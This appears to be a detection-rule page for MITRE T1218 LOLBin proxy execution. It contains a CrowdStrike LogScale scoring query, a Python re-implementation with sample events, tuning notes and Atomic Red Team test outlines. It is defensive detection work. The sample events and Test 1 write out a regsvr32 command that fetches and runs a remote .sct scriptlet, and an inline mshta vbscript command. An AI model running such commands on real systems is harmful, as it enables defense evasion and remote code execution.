T1218 CrowdStrike LogScale · LogScale

Detect System Binary Proxy Execution in CrowdStrike LogScale

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Several Microsoft-signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Sub-techniques include abuse of mshta.exe, rundll32.exe, regsvr32.exe, msiexec.exe, cmstp.exe, installutil.exe, regsvcs.exe, regasm.exe, odbcconf.exe, verclsid.exe, mavinject.exe, control.exe (Control Panel), compiled HTML files (hh.exe), MMC snap-ins, Electron applications, and wuauclt.exe. On Linux, trusted binaries such as split may be abused similarly. Real-world usage includes Lazarus Group abusing wuauclt.exe to execute malicious DLLs and Volt Typhoon broadly leveraging LOLBins to maintain and expand network access.

MITRE ATT&CK

Tactic: Defense Evasion
Technique: T1218 System Binary Proxy Execution
Canonical reference: https://attack.mitre.org/techniques/T1218/

LogScale Detection Query

CrowdStrike LogScale (LogScale)

```cql
#event_simpleName=ProcessRollup2
// Stage 1: restrict to the LOLBin filenames this rule covers
| FileName = /(?i)^(mshta|rundll32|regsvr32|msiexec|cmstp|installutil|regsvcs|regasm|odbcconf|verclsid|mavinject|hh|wuauclt|mmc|xwizard|syncappvpublishingserver|appsyncpublishingserver)\.exe$/
// Stage 2: keep events carrying at least one broad or binary-specific indicator.
// A literal "/" inside a /regex/ must be written "\/" in LogScale, so the switch
// prefixes (/s, /u, /i:, ...) are escaped below.
| (ParentBaseFileName = /(?i)^(winword|excel|powerpnt|outlook|onenote|msaccess|mspub|visio|wscript|cscript|mshta|cmd|powershell|pwsh|explorer)\.exe$/
  OR CommandLine = /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/
  OR CommandLine = /(?i)(\.sct|\.hta|\.vbs|\.wsf|\.js|scrobj)/
  OR (FileName = /(?i)^regsvr32\.exe$/ AND CommandLine = /(?i)(\/s|\/u|\/i:|scrobj|sct)/)
  OR (FileName = /(?i)^mshta\.exe$/ AND CommandLine = /(?i)(\.hta|javascript:|vbscript:)/)
  OR (FileName = /(?i)^rundll32\.exe$/ AND CommandLine = /(?i)(javascript:|shell32\.dll|advpack\.dll|ieadvpack\.dll|syssetup\.dll)/)
  OR (FileName = /(?i)^cmstp\.exe$/ AND CommandLine = /(?i)(\/s|\/ns|\.inf)/)
  OR (FileName = /(?i)^installutil\.exe$/ AND CommandLine = /(?i)(\/logfile=|\/LogToConsole=|\/U)/)
  OR (FileName = /(?i)^wuauclt\.exe$/ AND CommandLine = /(?i)UpdateDeploymentProvider/)
  OR (FileName = /(?i)^odbcconf\.exe$/ AND CommandLine = /(?i)(\/a|-a|regsvr|\.rsp)/))
// Stage 3: one 0/1 flag per indicator. LogScale assigns with ":=" and branches with
// case { ... }, not with Splunk-style "eval x = if(c, 1, 0)".
| case { ParentBaseFileName = /(?i)^(winword|excel|powerpnt|outlook|onenote|msaccess|mspub|visio)\.exe$/ | IsOfficeParent := 1; * | IsOfficeParent := 0 }
| case { CommandLine = /(?i)(http:\/\/|https:\/\/|ftp:\/\/)/ | HasRemoteURL := 1; * | HasRemoteURL := 0 }
| case { CommandLine = /(?i)(\.sct|\.hta|\.vbs|\.wsf|\.js|scrobj)/ | HasComScript := 1; * | HasComScript := 0 }
| case { FileName = /(?i)^regsvr32\.exe$/ AND CommandLine = /(?i)(\/s|\/u|\/i:|scrobj|sct)/ | RegSvr32Bypass := 1; * | RegSvr32Bypass := 0 }
| case { FileName = /(?i)^mshta\.exe$/ AND CommandLine = /(?i)(\.hta|javascript:|vbscript:)/ | MshtaSus := 1; * | MshtaSus := 0 }
| case { FileName = /(?i)^rundll32\.exe$/ AND CommandLine = /(?i)(javascript:|shell32\.dll|advpack\.dll|ieadvpack\.dll|syssetup\.dll)/ | RunDll32Sus := 1; * | RunDll32Sus := 0 }
| case { FileName = /(?i)^cmstp\.exe$/ AND CommandLine = /(?i)(\/s|\/ns|\.inf)/ | CMSTPInf := 1; * | CMSTPInf := 0 }
| case { FileName = /(?i)^installutil\.exe$/ AND CommandLine = /(?i)(\/logfile=|\/LogToConsole=|\/U)/ | InstallUtilBypass := 1; * | InstallUtilBypass := 0 }
| case { FileName = /(?i)^wuauclt\.exe$/ AND CommandLine = /(?i)UpdateDeploymentProvider/ | WuaucltDll := 1; * | WuaucltDll := 0 }
| case { FileName = /(?i)^odbcconf\.exe$/ AND CommandLine = /(?i)(\/a|-a|regsvr|\.rsp)/ | OdbcConfRSP := 1; * | OdbcConfRSP := 0 }
// Stage 4: sum the flags; events whose only hit was a non-Office parent score 0 and drop out here
| SuspicionScore := IsOfficeParent + HasRemoteURL + HasComScript + RegSvr32Bypass + MshtaSus + RunDll32Sus + CMSTPInf + InstallUtilBypass + WuaucltDll + OdbcConfRSP
| SuspicionScore > 0
| table([timestamp, ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, IsOfficeParent, HasRemoteURL, HasComScript, RegSvr32Bypass, MshtaSus, RunDll32Sus, CMSTPInf, InstallUtilBypass, WuaucltDll, OdbcConfRSP, SuspicionScore])
| sort(SuspicionScore, order=desc)
```
Severity: high. Confidence: high.

CrowdStrike LogScale (Falcon) detection for T1218 LOLBin proxy execution using ProcessRollup2 events. Filters on known LOLBin filenames, then scores each event across multiple suspicion indicators including Office/script parent process ancestry, remote URL references, COM script extensions, and binary-specific technique patterns. Requires Falcon sensor process telemetry.
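To make the scoring model concrete, the following Python is an added example (not code from the page or from CrowdStrike) that re-implements the query's stages offline: the LOLBin filename filter, the three broad indicators, the seven binary-specific indicators, the score sum, the "score > 0" drop and the descending sort. The regexes are copied from the query; the sample events are constructed for this example and are not real telemetry, and the field names simply follow the ProcessRollup2 fields the query uses. Running it shows one thing the prose does not spell out: an event such as msiexec.exe launched from cmd.exe passes the query's second stage (cmd.exe is in the parent list) but scores 0, because only Office parents contribute to the score, so it never reaches the results.

```python
import re
from typing import Optional

# Offline stand-in for the LogScale query's stages. The regexes are the ones in
# the page's query (Python does not need the "/" switch prefixes escaped).
LOLBIN_RE = re.compile(
    r"^(mshta|rundll32|regsvr32|msiexec|cmstp|installutil|regsvcs|regasm|"
    r"odbcconf|verclsid|mavinject|hh|wuauclt|mmc|xwizard|"
    r"syncappvpublishingserver|appsyncpublishingserver)\.exe$",
    re.I,
)
OFFICE_PARENT_RE = re.compile(
    r"^(winword|excel|powerpnt|outlook|onenote|msaccess|mspub|visio)\.exe$", re.I
)
REMOTE_URL_RE = re.compile(r"(http://|https://|ftp://)", re.I)
COM_SCRIPT_RE = re.compile(r"(\.sct|\.hta|\.vbs|\.wsf|\.js|scrobj)", re.I)

# Binary-specific indicators as (score field, FileName regex, CommandLine regex).
BINARY_INDICATORS = [
    ("RegSvr32Bypass", r"^regsvr32\.exe$", r"(/s|/u|/i:|scrobj|sct)"),
    ("MshtaSus", r"^mshta\.exe$", r"(\.hta|javascript:|vbscript:)"),
    ("RunDll32Sus", r"^rundll32\.exe$",
     r"(javascript:|shell32\.dll|advpack\.dll|ieadvpack\.dll|syssetup\.dll)"),
    ("CMSTPInf", r"^cmstp\.exe$", r"(/s|/ns|\.inf)"),
    ("InstallUtilBypass", r"^installutil\.exe$", r"(/logfile=|/LogToConsole=|/U)"),
    ("WuaucltDll", r"^wuauclt\.exe$", r"UpdateDeploymentProvider"),
    ("OdbcConfRSP", r"^odbcconf\.exe$", r"(/a|-a|regsvr|\.rsp)"),
]


def score_event(event: dict) -> Optional[dict]:
    """Score one ProcessRollup2-shaped event the way the query does.

    Returns the event plus its 0/1 indicator flags and SuspicionScore, or None
    when the query would drop it: FileName is not a listed LOLBin, or no
    indicator fires (the query's final "SuspicionScore > 0" stage).
    """
    file_name = event.get("FileName", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentBaseFileName", "")
    if not LOLBIN_RE.search(file_name):
        return None
    flags = {
        "IsOfficeParent": int(bool(OFFICE_PARENT_RE.search(parent))),
        "HasRemoteURL": int(bool(REMOTE_URL_RE.search(cmd))),
        "HasComScript": int(bool(COM_SCRIPT_RE.search(cmd))),
    }
    for field, fn_re, cl_re in BINARY_INDICATORS:
        hit = re.search(fn_re, file_name, re.I) and re.search(cl_re, cmd, re.I)
        flags[field] = int(bool(hit))
    score = sum(flags.values())
    if score == 0:
        return None
    return {**event, **flags, "SuspicionScore": score}


def run_detection(events: list) -> list:
    """Score every event and order the survivors by SuspicionScore, descending
    (stable, so equal scores keep input order), like the query's sort()."""
    scored = [s for s in (score_event(e) for e in events) if s is not None]
    return sorted(scored, key=lambda s: s["SuspicionScore"], reverse=True)


# Constructed sample events (not real telemetry); field names follow ProcessRollup2.
SAMPLE_EVENTS = [
    {   # Mirrors Test 1 on the page: regsvr32 fetching a remote .sct via scrobj.dll, from Word
        "ComputerName": "WS-01", "UserName": "alice",
        "FileName": "regsvr32.exe", "ParentBaseFileName": "winword.exe",
        "CommandLine": "regsvr32.exe /s /n /u /i:http://127.0.0.1:8080/payload.sct scrobj.dll",
    },
    {   # Routine deployment: passes the LOLBin filter and the parent list, but scores 0
        "ComputerName": "WS-02", "UserName": "SYSTEM",
        "FileName": "msiexec.exe", "ParentBaseFileName": "cmd.exe",
        "CommandLine": "msiexec.exe /i C:\\Deploy\\agent.msi /qn",
    },
    {   # Not a listed LOLBin: dropped at the first stage
        "ComputerName": "WS-03", "UserName": "bob",
        "FileName": "notepad.exe", "ParentBaseFileName": "explorer.exe",
        "CommandLine": "notepad.exe C:\\Users\\bob\\notes.txt",
    },
    {   # Mirrors Test 2 on the page: inline vbscript: handed to mshta
        "ComputerName": "WS-04", "UserName": "carol",
        "FileName": "mshta.exe", "ParentBaseFileName": "explorer.exe",
        "CommandLine": 'mshta.exe vbscript:Execute("MsgBox ""test"":close")',
    },
    {   # Benign-looking Control Panel launch that still trips the shell32.dll pattern (tuning candidate)
        "ComputerName": "WS-05", "UserName": "dave",
        "FileName": "rundll32.exe", "ParentBaseFileName": "explorer.exe",
        "CommandLine": "rundll32.exe C:\\Windows\\system32\\shell32.dll,Control_RunDLL desk.cpl",
    },
]

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row["SuspicionScore"], row["ComputerName"], row["FileName"], row["CommandLine"])
```

The regsvr32 event scores 4 (Office parent, remote URL, COM script extension and the regsvr32-specific pattern all fire), while the mshta and rundll32 events each score 1 from their binary-specific pattern alone. The rundll32 case is the kind of hit the tuning section is about: a stock Control Panel invocation matches the shell32.dll pattern, so a low score from a single indicator is worth treating differently from a multi-indicator hit.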

Data Sources

CrowdStrike Falcon Endpoint (ProcessRollup2 events)

Required Tables

#event_simpleName=ProcessRollup2

False Positives & Tuning

  • Legitimate software deployment systems using msiexec.exe or rundll32.exe invoked by management scripts running under powershell.exe or cmd.exe
  • COM-based application frameworks that call regsvr32.exe or regasm.exe to register plugins during install or repair operations
  • Security awareness or red team simulation tools running LOLBin atomic tests in a controlled environment without exclusions applied
  • Several command-line patterns are bare substrings ("sct", "\.js", "/s", "/u"), so ".json" arguments, paths containing "sct", or unrelated switches beginning with those letters also match; anchor them with word boundaries or whitespace if they generate noise

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1: Regsvr32 SCT Scriptlet Remote Execution

    Expected signal: Sysmon Event ID 1: Process Create with Image=regsvr32.exe, CommandLine containing '/s /n /u /i:http://127.0.0.1:8080/payload.sct scrobj.dll'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 (connection will fail). Sysmon Event ID 7: Image Load for scrobj.dll from C:\Windows\System32.

  2. Test 2: MSHTA Inline VBScript Execution

    Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with CommandLine containing 'vbscript:Execute'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe. Sysmon Event ID 11: File creation of mshta_test.txt in %TEMP%.

  3. Test 3: CMSTP INF File UAC Bypass and Execution

    Expected signal: Sysmon Event ID 1: Process Create for cmstp.exe with CommandLine containing '/s' and path to .inf file. Sysmon Event ID 11: File creation for test.inf and cmstp_test.txt. Sysmon Event ID 1 child: cmd.exe spawned by cmstp.exe executing the RunPreSetupCommands action.

  4. Test 4: InstallUtil CLR Bypass via /logfile Flag

    Expected signal: Sysmon Event ID 1: Process Create for installutil.exe with CommandLine containing '/logfile=' and '/LogToConsole=false'. Sysmon Event ID 7: Image loads for CLR DLLs (clr.dll, mscorwks.dll). The command will fail against calc.exe (not a valid .NET assembly) but the process creation telemetry fires.

  5. Test 5: Rundll32 JavaScript Execution

    Expected signal: Sysmon Event ID 1: Process Create for rundll32.exe with CommandLine containing 'javascript:' and 'mshtml'. Sysmon Event ID 7: Image Load for mshtml.dll into rundll32.exe. Sysmon Event ID 1 child: cmd.exe spawned. Sysmon Event ID 11: File creation for rundll32_test.txt.
